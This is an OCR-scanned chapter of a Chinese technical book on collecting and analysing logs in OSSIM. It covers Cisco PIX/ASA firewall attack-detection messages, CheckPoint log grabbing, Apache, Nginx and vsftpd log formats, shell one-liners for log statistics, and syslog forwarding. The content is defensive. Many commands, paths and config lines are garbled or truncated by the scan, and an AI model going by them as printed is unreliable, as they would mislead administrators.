PIX 可 以 设置 ACL 限制 用 户 对 任意 端口 的 访问 ， 当 某 个 用 户 明确 禁止 的 访问 到 达 PIX, 
PIX 就 会 产生 如 下 日 志 信息 : 


$PIX 4 106023:Deny protocol src [interface name:source address/source port]dst 
Interface name:dest address/dest port[type (string),code {code}] by 
access group acl ID 


(3) IP 碎片 攻击 日 志 
攻击 者 发 送 的 了 P 数据 包 如 果 有 很 小 的 偏 移 或 重 登 碎片 ， 那 么 就 会 绕 过 IDS， 所 以 必须 用 防火 
墙 处 理 。 举 例 : 当 一 个 分 段 数 大 于 12 的 IP 数据 包 被 防火 墙 Drop 时 ，PIX 产生 如 下 日 志 信息 : 
$PIX 4 209005:Discard IP fragment set with more than number 
elements:src-IP address,dest-IP address,proto-protocol,id-number 
当 发 现 碎片 重合 时 ， 产 生 一 条 teardrop GERD 系统 日 志 : 
$PIX 4 106020:Deny IP teardrop fragment (size-number,offset-number) from IP 
.address to IP address 
(4) LAND 攻击 时 记录 的 日 志 
LAND 攻击 是 一 种 针对 TCP 三 次 握手 机 制 漏洞 发 起 的 攻击 ， 很 多 系统 在 长 时 间 受 到 这 种 
攻击 时 会 停止 工作 。PIX 防火 墙 检 测 到 这 种 攻击 时 ， 记 录 日 志 如 下 : 


$PIX 2 106017:Deny IP due to Land Attack from IP address to IP address 


2. Cisco ASA 防火 墙 日 志 


OSSIM 记录 的 ASA 日 志 如 图 7-28 所 示 。ASA 日 志 举例 : 


<182>Dec 22 2010 14:03:05: $ASA-6-302013: Built inbound TCP connection 698572247 
for outside:218.200.47.30/12026 (218.200.47.30/12026) to inside:10.1.2.97/443 
(192.168.150.97/443) 


日 志 格式 :时间 - 日 志 编号 -连接 发 起 端 -协议 类 型 -实际 源 地 址 -实际 目标 地 址 。 
“Built inbound TCP connection” 建 立 入 站 TCP 连接 ， 代 表 该 连接 是 从 外 部 连 进来 。 
<182>Dec 22 2010 10:52:59: $ASA-6-302015: Built outbound UDP connection 


697738382 for outside:117.18.82.7/123 (117.18.82.7/123) to inside:10.10.1.31/2693 
(192.168.100.9/59375) Built 


dA 通常 Cisco 防火 墙 eth0 接口 定义 为 outside K, Security-Level:0, $% Router F0/0. ASA 防 

| ” XE ethl 接口 定义 为 insdie 区 ,Security-Level:100, 接 Switch 的 上 联 口 。 中 间 的 DMZLevel 

| 为 50。 从 优先 级 低 到 优先 级 高 的 方向 为 inbound ,反之 为 outbound, 所 以 数据 从 eth1(Switch) 
一 eth0 (Router) 为 outbound， 从 eth0 (Router) —ethl (Switch) 为 inbound. 
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Kd 7-28  OSSIM 记录 Cisco ASA 日 志 


7.10.4 收集 CheckPoint 设备 日 志 

本 实验 目的 为 收集 Checkpoint 设备 日 志 ， 在 型 号 R60、R70 设备 上 通过 测试 ， 在 OSSIM 
系统 中 集成 了 checkpoint fw1 的 插件 。 下 面 我 们 以 R60 (fwlngr60) 为 例 讲解 。 

在 使 用 OSSIM 4.2 系统 时 ， 首 先 确定 已 经 装 好 ia32libs 包 ， 安 装 方法 : 
© #apt-get install 1ib32stdc++6 ia32-libs (安装 这 两 个 包 大 约 100MB) 。 | 


再 安装 fwl-loggrabber 。 我 们 可 以 通过 Web 界面 下 载 ， 也 可 以 直接 在 
/usr/share/ossim/www/downloads 目录 下 找到 fwl-loggrabber-1.11.1-linux.tar.gzo 


解压 : 
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angelegt 
"fwl-loggrabber" - »"/usr/local/fwl-loggrabber/bin/fwl-loggraber" 


当 安 装 完成 后 ， 可 以 在 /usr/local/ 目 录 下 发 现 多 了 一 个 fwl-loggrabber 目录 ， 其 中 就 是 刚才 
安装 的 软件 。 然 后 修改 /etc/profile 声明 两 个 变量 。 
#vi /etc/profile 
export LOGGRABBER CONFIG PATH-/usr/local/fwl-loggrabber/etc 
export LOGGRABBER TEMP PATH-/tmp 
#env〔 显 示 环 境 变 量 ) 
在 /usr/local/fw1-loggrabber/etc/ 目 录 下 的 配置 文件 都 是 以 unix-sample 结尾 的 示例 配置 ， 将 
其 分 别 复制 成 fw1-loggrabber.conf 和 lea.conf。 
下 面 继 续 配置 设备 日 志 相关 信息 。 
将 loggrabber.conf 文件 中 第 42 行 修改 成 如 下 设置 。 


OUTPUT FILE PREFIX-"/var/log/ossim/fwl-loggrabber" 


修改 /etc/ossim/agent/plugins/fwlngr60.cfg 插件 配置 文件 中 第 15 行 ， 如 下 : 
localtion=/var/log/ossim/fwl-loggrabber/fw1l.log 


修改 19 fT, Wr: 


create file-true 


保存 退出 ， 执 行 以 下 命令 : 

#/usr/local/fwl-loggrabber/bin/fwl-loggrabber -c 
/usr/local/fwi-loggrabber/etc/fwl-loggrabber.conf -1 
/usr/loca/fwl-loggrabber/etc/lea.conf 

如 果 提 示 “error while loading shared libraries:libpam.so.0:can not open shared object file:No 
such file or director” 说 明 第 一 步 没 装 好 。 

下 面 就 可 以 配置 CheckPoint 防 火 墙 了 。 登 录 到 Check Point SmartDashboard 中 , 选择 Manage 
一 Servers and OPSEC Applications， 在 弹出 的 对 话 框 中 选择 “New”， 输 入 名 称 后 选择 “Client 
Entities" Jj LEA, "Server Entities” 选 项 为 空 ， 然 后 单 击 “Communication ”按钮 ， 然 后 系统 
会 提示 下 载 证 书 验证 ， 这 时 可 以 到 /var/log/ossim 目录 下 查看 CheckPoint 日 志 了 。 


7.10.5 Aruba (无线 AP) 的 日 志 
Aruba 的 无 线 产品 质量 不 错 ，2015 年 被 HP 公司 收购 之 后 ， 在 国内 无 线 设备 市 场 占有 率 不 
断 攀 升 。 下 面 了 解 一 下 这 款 AP 在 OSSIM 中 的 应 用 实例 ， 先 看 一 条 Aruba AP 日 志 : 


Mar 8 18 08 36 2015 [10.0.0.252] sapd[190] «404081» <ERRS> AP sanmateo810.0.0.127 
sapd AM 00 0b 86 6131 60 Wireless bridge detected with Transmitter 00 03 52 e7 c5 20 Rece 
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iver 00 03 52 e7 90 30 Channel 4andRSSI 12 


这 条 日 志 在 OSSIM 日 志 管理 系统 中 显示 如 图 7-29 所 示 的 内 容 。 


al 14 B 


ENVIRONMENT 
SEARCH: iinr me 


Ts | PREDEFINED SEARCHE 


dest Pose /Swich Weile 


7-29 Aruba AP 日 志 


7.11 Apache 日 志 分 析 


我 们 先 以 最 为 常见 的 Apache 服务 器 为 例 进 行 日 志 分析 。 Apache 服务 器 的 日 志文 件 中 包含 
着 大 量 有 用 的 信息 , 这 些 信息 经 过 分 析 和 深入 挖掘 之 后 , 能够 最 大 限度 地 在 系统 管理 人 员 及 安 
全 取证 人 员 的 工作 中 发 挥 重要 作用 。 


7.11.1 日 志 作 用 
Apache 访问 日 志 在 实际 工作 中 非常 有 用 ， 比 较 典 型 的 例子 是 进行 网 站 流量 统计 ， 查 看 用 
户 访问 时 间 、 地 理 位 置 分 布 、 页 面 点 击 率 等 。Apache 的 访问 日 志 具 有 如 下 4 个 方面 的 作用 : 
€ 记录 访问 服务 器 的 远程 主机 IP 地 址 ， 从 而 可 以 得 知 浏览 者 来 自 何 处 ; 
@ 记录 浏览 者 访问 的 Web 资源 ， 可 以 了 解 网 站 中 的 哪些 部 分 最 受 欢迎 ; 
€ ”记录 浏览 者 使 用 的 浏览 器 ， 可 以 根据 大 多 数 浏览 者 使 用 的 浏览 器 对 站 点 进行 优化 ; 
e 记录 浏览 者 的 访问 时 间 。 
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7.11.2 日 志 格 式 分 析 

RAW log 日 志 ， 又 称 为 原始 日 志 。 分 析 这 种 日 志 的 基础 是 了 解 日 志 中 每 段 信息 表达 的 含 
义 。 在 Apache 中 访问 日 志 功 能 由 mod_log_config 模块 提供 ， 它 用 默认 的 CLF (common log 
format) 来 记录 访问 日 志 。 例 如 LogFormat "%h%1%u%t %r"。 下 面 是 一 条 Apache 服务 器 记录 
的 实际 访问 日 志 ， 各 列 ( 用 颜色 代表 对 应 列 的 含义 ， 读 者 可 以 参看 实际 操作 界面 ) 含义 如 表 
7-4 所 示 。 

200.202.39.131- - [21/Nov 2012:10:45:13*0800] "GET original Wwarn.pngHTTP/1.1" 200 


远程 主机 他 地 址 


时 区 方法 PURI 协议 ”返回 状态 


表 7-4 Apache 访问 日 志 分 析 


域 内 容 ESA 
$1 200.202.39.131 远程 主机 IP 地 址 ，%h 
$2 - 占 位 符 ，%1 


$3 - 占 位 符 ，%u 

$4 21/Nov/2012:10:45:13 “| 服务 器 完成 请 求 处 理 时 间 ，[ 日 /月 /年 :小 时 : 分 钟 : 秒 : 时 区 ]%t 
$5 +0800 时 区 

$6 GET 方法 (GET. POST) %r\ 

$7 Joriginal/warn.png 资源 URL 

$8 HTTP/1.1 协议 


$9 200 返回 状态 %s 


发 送 给 客户 端 总 字 节 数 ，%b 


$10 1961 


im 主机 地 址 〈 表 7-4 中 为 200.202.39.131) 后 面 紧 跟 的 两 项 内 容 现在 很 少 使 用 ， 所 以 用 两 个 
| “-” 占 位 符 替代 。 


7.11.3 ”日志 统计 举例 

可 以 用 tail 命令 来 实时 查看 日 志文 件 的 变化 ,但 是 各 种 应 用 系统 中 的 日 志 会 非常 复杂 ， 
堆 长 度 超过 浏览 极限 的 日 志 出 现在 眼前 时 ,会 觉得 非常 无 奈 , 怎么 办 呢 ? 这 时 可 以 用 grep. sed. 
awk 和 sort 等 筛选 工具 帮助 你 解决 这 个 问题 。 下 面 总 结 了 几 个 常见 分 析 方法 。 


(1) 查看 IP ($1 代表 IP). 

#cat access log | awk '{print $1]' 

(2) 对 IP HET. 

#cat access log | awk '{print $1]'|sort 

G) 打印 每 一 重复 行 出 现 的 次 数 ，“uniq -c” 表 示 标 记 出 重复 数量 。 


#cat access log | awk '(print $1)'|sort|uniq -c 
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D 排序 并 统计 行 数 。 


(5) 显示 访问 前 10 位 的 IP 地 址 ， 便 于 查找 攻击 源 。 


awk ' (print $19 表 示 取 日 志 的 第 一 段 ， 如 果 换 成 别 的 日 志 ， 其 IP 地 址 在 第 3 段 ， 那 么 就 要 | 
改变 相应 的 数值 。 


(6) 显示 指定 时 间 以 后 的 日 志 〈$4 代表 时 间 )。 


推荐 大 家 在 排 错 时 ， 同 时 打开 多 个 终端 ， 比 如 在 一 个 窗口 中 显示 错误 日 志 ,在 另 一 个 窗口 
中 显示 访问 日 志 ， 这 样 就 能 够 随时 获知 网 站 上 发 生 的 情况 。 


CD 找 出 访问 量 最 大 的 IP， 并 封 掉 ( 对 排 错 很 有 帮助 )。 


如 果 将 上 面 的 Shell 做 以 下 变形 就 可 以 得 出 访问 量 TOP 10。 


(8) 找 出 Apache 日 志 中 ， 下 载 最 多 的 几 个 exe 文件 (下 载 类 网 站 常用 ， 这 里 以 .exe 扩展 
名 举例 )。 


使 用 如 下 命令 : 


这 条 命令 经 过 增加 一 个 “>10000000” 的 条 件 判 断 内 容 就 可 以 显示 出 大 于 10MB 的 exe 文件 ， 
并 统计 对 应 文件 发 生 次 数 ， 这 条 命令 对 于 网 站 日 常 分 析 是 非常 有 帮助 的 ， 大 家 可 以 灵活 使 用 。 


7.11.4 ”错误 日 志 分 析 
错误 日 志 记录 了 服务 器 运行 期 间 遇 到 的 各 种 故障 , 以 及 一 些 普通 的 诊断 信息 ,比如 服务 器 
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启动 /关闭 时 间 。 错误 日 志和 访问 日 志 一 样 也 是 Apache 的 标准 日 志 。 它 在 http.conf 配置 文件 中 
ErrorLog logs/ error log 处 定义 路 径 和 格式 ， 错 误 日 志和 访问 日 志 一 般 放 在 同一 个 目录 。 

日 志文 件 记 录 信 息 级 别 的 高 低 , 控制 日 志文 件 记录 信息 的 数量 和 类 型 , 都 是 通过 LogLevel 
指令 实现 的 ， 该 指令 默认 设置 的 级 别 是 error， 有 关 该 指令 中 允许 设置 的 各 种 选项 的 完整 清单 ， 
请 参见 http://wiki.apache.org/httpd/FAQ 的 Apache 文档 。 最 常见 的 错误 日 志文 件 有 两 类 ， 一 类 
是 文档 错误 信息 ， 另 一 类 是 CGI 错误 信息 。 


CD 文档 错误 
文档 错误 和 服务 器 应 
Found《〈 文 档 没 有 找到 )。 这 种 错误 在 用 户 请 求 的 URL 不 存在 的 时 候 出 现 ， 一 般 是 由 于 用 户 输 
入 的 URL 错误 ， 或 者 由 于 Web 服务 器 上 已 存在 的 文件 被 删除 或 移动 。 
错误 日 志 中 出 现 的 记录 如 下 所 示 : 
[Sun Dec 23 06:17:18 2012] [error] [client 192.168.150.16] File does not 
exist:/usr/local/apache2/docs/index. html 
[Sun Dec 23 06:27:58 2012] [notice] Apache/2.2. 16 (Debian)PHP/5. 3. 3-7+squeezel4 with 
Een iris Life html/3.0.1 mod ssl/2.2.16 OpenSSL/0.9.80 mod perl/2.0.4 Perl/v5.10.1 
configured —re: normal operations 
[Sun Dec 23 07: 2r: 18 2012] [error] [client 192.168.150.149 PHP Warning: preg.replaceO: 
Compilation failed:missing terminating] for character class at offset 9 ii 
/usr/share/ocsinventory-server/ocsreports/groups.php on line 
126, referer:https://192. 168. 150. 28/ossin/ocsreports/index. php?multi=37 


[Sun Dec 23 09:17:28 2012] [warn] RSA server certificate CommonName (CN) "localhost" 
does NOT match Server name!? 


错误 日 志和 访问 日 志 格 式 类 似 ， 不 同 之 处 在 [error] 这 一 项 ， 它 表示 记录 级 别 ， 为 方便 开发 
和 调试 分 为 0~7 级 ， 含 义 同 表 7-4 所 示 内 容 。 日 志 中 的 错误 级 别 由 配置 文件 中 LogLevel 指令 
负责 调整 ， 它 的 主要 作用 是 控制 错误 日 志 的 详细 程度 (在 httpd.conf 配置 文件 中 说 明 )。 

记录 级 别 从 0~7 级 ， 日 志 记 录 量 是 从 小 向 大 方向 增长 ，7 级 为 最 高 ， 这 和 思科 等 路 由 器 
的 debug 模式 相同 。 各 级 别 的 关系 如 图 7-30 所 示 。 


730 日 志 记 录 等 级 


从 图 7-30 可 以 看 出 ,日 志 按 严重 程度 分 为 8 组 ， 从 高 到 低 依次 为 紧急 (0 RAD WE (1 
级 )、 关 键 、 错 误 、 一 般 错 误 、 警 告 、 通 知 及 消息 调试 。 圆 圈 越 大 ， 则 说 明 所 记录 的 日 志 信息 
量 越 多 ，8 级 (Debugging， 调 试 级 ) 包含 了 上 面 7 级 记录 的 所 有 信息 ， 所 以 它 的 日 志 量 最 大 ， 
因此 不 要 在 工作 的 设备 上 启用 这 一 级 。 
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在 正常 运行 的 服务 器 上 ， 一 般 有 两 种 错误 信息 ， 一 种 是 文档 错误 ， 最 常见 的 就 是 400 
系列 错误 ， 例 如 文件 被 移 走 或 删除 而 出 现 的 404 错误 等 ; 另 一 种 是 CGI 错误 ， 主 要 由 CGI 
程序 引起 。 

(2) CGI 错误 

错误 日 志 还 能 诊断 异常 行为 的 CGI 程序 。 为 了 进一步 分 析 和 处 理 方 便 ，CGI 程序 输出 到 
STDERR (Standard Pen po 的 所 有 内 容 都 将 直接 进入 错误 日 志 。 如 果 CGI 程序 
出 现 了 问题 ， 错 误 日 志 就 会 告诉 我 们 有 关 问 题 的 详细 信息 。 

下 面 是 一 个 例子 ， A 代码 时 ， 错 误 日 志 中 出 现 的 一 个 错误 记录 : 


[Sat Feb 05 14:01:29 2012] [error] [client 220.106.0.18] Premature end of script headers: 
/usr/local/apache2/cgi -bin/doc/index. cgi Global symbol "$rv" requires explicit package name at 
/usr/local/apache2/cgi-bin/doc/index.cgi line 70. 

[Sat Feb 05 14:08:24 2012] [error] [client 220.106.0.18] Premature end of script headers: cgi 
[Sat Feb 05 14:01:52 2012] error] [client 220.106.0.18] (Exec format error: exec of '/ 
usr/local/apache2/cgi-bin/doc /Search/cgi-bin/cgi' failed 


错误 日 志 记 录 通 常 以 行为 单位 。 在 上 面 给 出 的 情况 中 ，CGI 错误 就 会 出 现 多 行情 况 ， 从 这 
一 点 看 ，Apache 日 志 级 别 的 定义 也 不 是 很 严格 ， 例 如 在 单个 文件 记录 所 有 日 志 时 ， 无 论 使 用 
哪 种 错误 级 别 ,在 日 志 中 总 会 显示 Notice 级 别 的 信息 ， 这 些 信 息 虽 然 是 提醒 程序 员 需 要 注意 ， 
有 时 却 显 得 多 余 。 所 以 建议 大 家 使 用 Rsyslog 记录 日 志 ， 这 样 就 不 会 出 现 上 述 问 题 。 
默认 将 错误 文件 放 在 Apache 配置 文件 中 ServerRoot 的 logs 目录 下 ， 一 般 路 径 位 于 
/varlog/apache2/error_ log， 这 里 假设 文件 名 为 error log (有 的 系统 为 errorlog )。 


A 如 果 在 配置 文件 中 停止 输出 错误 日 志 ， 例 如 : ) 


l errorlog /dev/null 


ERI AR E KREA Pr ELI es A Br AEAEE DG FREE 
法 ， 不 过 有 时 错误 日 志 会 变 得 非常 大 。 


Nginx 日 志 分 析 


Nginx 日 志和 Apache 日 志 相 似 ， 同 样 分 为 访问 日 志和 错误 日 志 ， 它 们 都 在 nginx.conf 配 
置 文件 中 定义 。 为 了 分 析 Nginix 日 志 读者 需要 了 解 其 格式 字段 的 含义 。 


7.12.1 基本 格式 
以 Nginx 默认 的 日 志 格 式 为 例 其 格式 如 下 : 


$remote addr - $remote user [$time local] "$request" $status $body bytes sent 
"$http referer" "$http user agent" 
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各 字段 的 含义 分 别 为 : 

€ Sremote addr: 请 求 者 IP。 

€ $remote_ user: HTTP 授权 用 户 ， 如 果 不 使 用 Http-based 认证 方式 ， 其 值 为 空 。 

€ [$time local]: JR 4-25 Hj I9] X. 

€ "Srequest": HTTP 请 求 类 型 (如 GET, POST A ) HTTP 请 求 路 径 ( 不 含 参数 ) -HTTP 
协议 版 本 。 

$status: 服务 器 返回 的 状态 码 (如 200，404，5xx 等 ) 。 

Sbody bytes sent: 服务 器 响应 报 文大 小 ， 单 位 byte. 

"$http_referer": referer 字段 值 。 

"$http_user_agent": User Agent 字段 。 


了 解 日 志 基 本 格式 对 于 以 后 我 们 分 析 日 志 有 好 处 ， 下 面 是 为 /var/log/nginx/ 访 问 日 志 的 例 
子 ， 如 图 7-31 所 示 。 


192.168.91.1 2015:02:33:37 -0500] "GE P71. 200 15? "-" "| 


lla/5.0 (Windows NT 6.1; U0U6 Trident/7? FU 


图 7-31 一 段 nginx 日 志 实 例 
以 下 列举 常用 的 日 志 分 析 命令 ， 图 7-32 所 示 命令 是 根据 状态 码 进行 请 求 次 数 排序 ; 


alienvault: /var/log/nginxtt cat localhost access.1log lcut -d ’” -f3 Icut -d ° ’ 
f2 Isort luniq -c Isort -r 

2 404 

1 200 
ilienvault:^var/log/ng inxtt 


图 7-32 根据 状态 码 排序 
使 用 awk 命令 也 可 以 实现 以 上 功能 ， 操 作 效果 如 图 7-33 所 示 。 


lienvault:/var/log/nginxt awk ’ {print $9}° localhost .access.1log Isort luniq -c 


图 7-33 用 awk 实现 排序 
接着 ， 查 看 404 请 求 ， 如 何 找 到 这 些 URL， 操 作 效果 如 图 7-34 所 示 。 


r 
2 192.168.91.1 06/Fe 5 3:37 -0500] "GET /favicon.ico HTTPz1 .1| 


" "Mozilla/! indo .1: Min64: x64; Trident/7.0; ru:11.0) li 


图 7-34 查找 URL 


接 下 来 考虑 ， 包 含 favicon.ico 〈 也 可 以 是 一 个 网 址 的 一 部 分 )， 找 到 这 些 请 求 的 卫 地 址 ， 
使 用 awk 命令 ， 操 作 效 果 如 图 7-35 所 示 。 


414 


第 7 章 OSSIM 日 志 收集 与 分 析 


alienvault:^/uar/log/nginxtt auk -F \" '($2 ^""7fauicon.ico'")(print $1}’ localhost 
access .1og lawk ’ {print $1}? 1sort luniq Isort -r 


3 192.16 1 
alienvault log/ng i mat 


E735 ”查找 IP 


7.12.2 将 Nginx 日 志 发 送 到 Syslog 

在 Nginx Plus 中 直接 支持 将 access_log 和 error_log 发 送 到 syslog， 但 在 免费 的 版 本 Nginx 
中 ， 默 认 情 况 下 日 志 不 支持 syslog 功能 ， 所 以 只 能 找 第 三 方 模块 ， 支 持 syslog 的 Nginx 第 三 
方 模块 ， 下 载 地 址 为 https://github.com/yaoweibin/nginx_syslog_patch， 具 体 安装 /配置 方法 可 以 
直接 看 下 载 地 址 中 的 README 文件 。 


FTP 日 志 分 析 


FTP 是 老牌 的 文件 传输 协议 ， 在 网 络 中 应 用 非常 广泛 。 本 节 对 Vsftp 服务 器 的 日 志 进 行 习 
点 讨论 ， 在 Redhat Linux 系统 下 Vsftp 的 配置 文件 在 /etc/vsftp/vsftp.conf 文件 中 。 默 认 情况 下 ， 
Vsfip 不 单独 记录 日 志 ， 也 就 是 说 不 会 输出 到 一 个 单独 的 文件 中 存储 ， 而 是 统一 存放 到 
/var/log/messages 文件 中 。Vsftp 日 志 实例 显示 如 下 。 


iz 


[rootélocalhost httpd]£ cat /var/log/messages |grep vsftp 
Jan 4 01:03:52 localhost vsftpd: Fri Jan 4 06:03:52 2013 [pid 9298] CONNECT: Client "192.168.15 


0.1 

Jan 4 01:03:57 localhost vsftpd: Fri Jan 4 06:03:57 2013 [pid 9297] [tet] FAIL LOGIN: Client "1 
92.168.150.1 

Jan 4 01:14:01 localhost vsftpd: Fri Jan 4 06:14:01 2013 [pid 9392] CONNECT: Client "192.168.15 
9.1" 

Jan 4 01:14:03 localhost vsftpd: Fri Jan 4 06:14:03 2013 [pid 9391] [test] OK LOGIN: Client "19 
2.168.150.1" 

Jan 4 01:16:02 localhost vsftpd: Fri Jan 4 01:16:02 2013 [pid 9423] CONNECT: Client "192.168.15 
0.1" 

Jan 4 01:16:04 localhost vsftpd: Fri Jan 4 01:16:04 2013 [pid 9422] [test] OK LOGIN: Client "19 
2.168.150.1" 


通过 在 messages 中 过 滤 的 方法 可 以 看 到 Vsftp 的 客户 机 连接 日 志 ， 但 这 段 日 志 只 反映 
了 少量 信息 ， 如 果 需 要 查看 更 详细 的 信息 该 如 何 操作 ? 下 面 来 看 看 怎样 配置 
/etc/vsftp/vsftp.conf 文件 。 


7.13.1 FTP 日 志 分 析 
如 何 将 Vsftp 服务 器 的 日 志 单独 输出 到 某 个 文件 下 呢 ? 我 们 需要 在 vsftp.conf 配置 文件 中 
修改 三 处 ， 如 下 所 示 。 
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dirmessage enable=YES 

* 
Activate logging of uploads/downloads. 
erlog enable-YES 

# 


# Make sure PORT transfer connections originate from port 20 (ftp-data). 
connect_from_port_20=YES 
# 


# If you want, you can arrange for uploaded anonymous files to be owned by 
# a different user. Note! Using "root" for uploaded files is not 

# recommended! 

#chown_uploads=YES 

#chown_username=whoever 

# 

# You may override where the log file goes if you like. The default is shown 
# below. 

vsftpd_log_file=/var/log/vsftpd. log 


xferlog file=/var/log/xferlog 
ra 4 If you want, you can have your log file in standard ftpd xferlog format 
erlog std format-YES 


l log enable-YES 
e localtime-YES 
* 
You may change the default value for timing out an idle session. 


在 上 面 三 处 配置 中 ， 我 们 做 了 修改 : 


CD 标识 A: 启用 xferlog_enable=YES， 它 表示 把 客户 机 登录 服务 器 后 上 传 或 下 载 的 文 
件 具 体 信 息 记 录 下 来 。 

(2) 标识 B: 启用 xferlog_file=/var/log/xfer.log， 它 表示 把 上 传 下 载 记录 写 到 指定 文件 ， 
也 就 是 /var/log/xferlog 文件 。 

G) HARC: 启用 dual_log_enable=YES， 它 表示 启用 双 份 日 志 ， 一 份 日 志 由 xferlog 记录 ， 
同时 vsftpd.log 也 记录 另 一 份 日 志 ， 注 意 两 份 日 志 并 非 互 为 备份 ， 其 内 容 不 同 ， 但 各 有 千秋 。 


接 下 来 还 得 解释 一 下 /usr/bin/xferstats， 它 是 日 志 统 计 工具 ， 用 于 计算 传输 了 多 少 文件 并 创 
建 日 志文 件 。 注 意 : 在 Linux 系统 中 一 定 要 安装 xferstats 的 包 后 ， 才 能 对 它 进行 操作 。 


7.13.2 ”分析 vsftpd.log 和 xferlog 


Vsftpd.log 和 xferlog 是 Vsftp 服务 器 记录 日 志 的 来 源 ， 下 面 重点 对 这 两 种 日 志文 件 的 格式 
进行 分 析 。 


(1) vsftpd.log 实例 分 析 
首先 打开 vsftpd.log.1 文件 ， 查 看 它 的 日 志 结构 。 


[rootélocalhost log]# cat vsftpd.log.l 

Thu Jan 3 14:06:07 2013 [pid 36351 CONNECT: Client “192.168.150.1” 

Thu Jan 3 14:06:10 2013 [pid 3634] [test] OK LOGIN: Client "192.168.150.1" 
Thu Sep 5 04:08:19 2013 [pid 4325] CONNECT: Client "192.168.150.1" 

Thu Sep 5 04:08:21 2013 [pid 4324] [test] OK LOGIN: Client "192.168.150.1" 
Thu Sep 5 04:08:58 2013 [pid 4451] CONNECT: Client "192.168.150.28" 


Thu Sep [pid 4450] [test] OK LOGIN: Client "192.168.150.28* 
Thu Sep [pid 4467] CONNECT: Client -192.168.150.147- 

Thu Sep [pid 4466] [test] OK LOGIN: Client 7192.168.150.147- 

Thu Sep [pid 4468] [test] OK MKDIR: Client "192.168.150.147^, "/home/test/huge* 


上 面 日 志 仅 反映 了 部 分 FTP 登录 情况 ， 例 如 登录 IP 地 址 、 用 户 名 。 但 下 载 软件 内 容 不 会 
记录 下 来 ， 有 时 网 管 恰好 关心 这 一 段 日 志 信息 ， 这 时 我 们 需要 同时 参考 xferlog 日 志 ， 还 记得 
上 面 说 过 的 xferstats 工具 吗 ? 
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xferlog 日 志 会 记录 FTP 会 话 详细 信息 , 它 能 够 显示 客户 机 向 FTP Server. 上 传 /下 载 的 文件 
路 径 、 名 称 及 认证 方式 等 信息 ， 下 面 我 们 查看 该 文件 的 具体 内 容 。 


[root@localhost log]# cat xferlog.l 
Thu Jan 3 14:24:48 2013 1 127.0.0.1 8646 /home/test/nmbd.log b i r test ftp O * c 

Thu Jan 3 14:36:46 2013 60 192.168.150.1 0 /home/test/syslog.]pg a i r test ftp 0 * i 
Thu Jan 3 15:06:58 2013 1 192.168.150.151 8646 /home/test/nmbd.log b o r test ftp © * c 
Thu Jan 3 15:07:01 2013 1 192.168.150.151 0 /home/test/123.txt b _ o r test ftp 6 * c 
Thu Sep 5 04:03:51 2013 1 192.168.150.206 0 /home/test/syslog.j]pg b _ o r test ftp 8 * c 


Xferlog 日 志 格式 如 下 ， 其 解析 见 表 7-5. 


Thu Jan 3 14:24:46 2013| r É 


1 2 


3 4 5 678910 11121314 


4k 7-5 xferlog 日 志 格式 


含义 

传输 类 型 : 

a: 表示 ASCII 传输 ， 用 于 文本 类 型 ; 
b: 表示 二 进 制 传输 ， 用 于 程序 、 多 媒体 文件 


文件 传输 方向 : 

o: 从 FTP 服务 器 向 客户 端 传输 
i 从 客户 端 向 FTP 服务 器 传输 
访问 模式 : 

a: 匿名 用 户 

g: KÈ 〈guest) HP 

rn 真实 用 户 


用 户 名 


FTP 服务 器 名 称 ， 通 常 为 ftp 


认证 方式 ,一 般 用 0 表示 


认证 用 户 ID， 在 无 须 认 证 时 用 * 表 示 ， 如 果 vsftpd 使 
用 了 PAM 配置 ， 这 里 会 有 虚拟 用 户 名 显示 
传输 状态 : c 表示 完成 ，i 表示 传输 异常 
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这 里 的 认证 是 结合 PAM (一 种 可 插入 的 安全 验证 模块 ) 的 方式 ， 主 要 是 为 了 保证 安全 。 
i 在 企业 中 常会 用 到 VsftptPam+Postgresql 的 架构 ， 在 这 种 架构 中 我 们 可 以 设置 为 用 MD5 
l 工具 来 验证 密码 ， 这 样 客户 机 必须 用 MDS 加 密 的 密码 登录 系统 才能 成 功 获取 文件 。 


7.13.3 将 Linux 的 Vsftp 日 志 发 送 到 OSSIM 
本 节 给 大 家 介绍 如 何 将 RHELS Linux 下 的 Vsftp 服务 器 日 志 发 送 到 OSSIM 4.8 系统 ， 步 


(1) f£ vsftpd.conf 中 添加 Syslog enable- YES 一 行 ， 如 图 7-36 所 示 。 


fü) Applications Places System ® 


rootGlocalhost-— 


Ele Edit View Terminal Tabs Help 

# with the listen ipv6 directive. 

listeneYES 

# 

# This directive enables listening on IPv6 sockets. To listen on IPv4 and IPv6 
# sockets, you must run two copies of vsftpd whith two configuration files. 
# Make sure, that one of the listen options is commented !! 
#listen_ipv6=YES 

syslog enable-YES 

pam service name-vsftpd 

userlist enable=YES 

tcp wrapperseYES 


7-36 配置 vsftpd.conf 


(2) 在 syslog.conf 或 者 rsyslog.conf 中 添加 一 行 ， 如 图 7-37 所 示 。 
和 8192.168.11.212 


E7 这 里 “192.168.11.212” 为 OSSIM SensorIP 地 址 。 


L 


füb Applications Places System ® 
rootGlocalhost:— z0x 

Ble Edi View Terminal Tabs Help 

4 Log all kernel messages to the console. 


* Logging much eise clutters up tne screen. 
#kern.* /dev/console 


* Log anything (except mail) of level info or higher. 
# Don't log private authentication messages! 


* .1nfo;mail.none;news.none;authpriv.none;cron.none /var/1og/message 
s 

ftp.* 6192.169.11.218 

# The authpriv file has restricted access. 

authpriv.* /var/log/secure 


# Log all the mail messages in one place. 
mail.* -/var/log/maillog 


# Log cron stuff 
cron.* /var/iog/cron 


* Everybody gets emergency messages 
*.emerg * 


4 Save news errors of level crit and higher in a special file. 


7-37 BUE vsfipd.conf 
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(3 ) 在 CONFIGURATION 一 COMPONENTS 一 ALIENVAULT CENTER 一 SENSOR 
CONFIGURATION 下 的 COLLECTION 中 添加 vsftpd 插件 并 启用 ， 效 果 如 图 7-38、 图 7-39 所 示 。 


20140426073734 ossec: FTPsesslnrronad LI Ostecconnection attempt. sensor localhos: NAA 
Date: 20140426 07:3734 

3040420073734 —— ossec FTP sess RTT OMS TY e essecconnedtion attempt. sensor localhost NA 

sk: 

Plugin: ossec-connection. attempt, Pugn_5d 11401 

2010926073732 Host operating s Sansor Sensor [T2 TEE TEIZ] anomales sensor localhost localhost 
Source IP localhost [192.168.11.214] 

20140428073624 ossec: Login ses: Dest IP: N/A [0.0.0.0] ossecsyslog sensor 5150248117 gg alenvault 


Prorty- 1, Relabiliy + 


2040426073620 ossec Logn ses RR DRE pue asam pum 
Amet 2, aser Dee 2 
图 7-38 vsftpd 插件 启用 效果 
EVENT DETAIL 
PEETS z mm ne 
NoRMALZED 
WA 


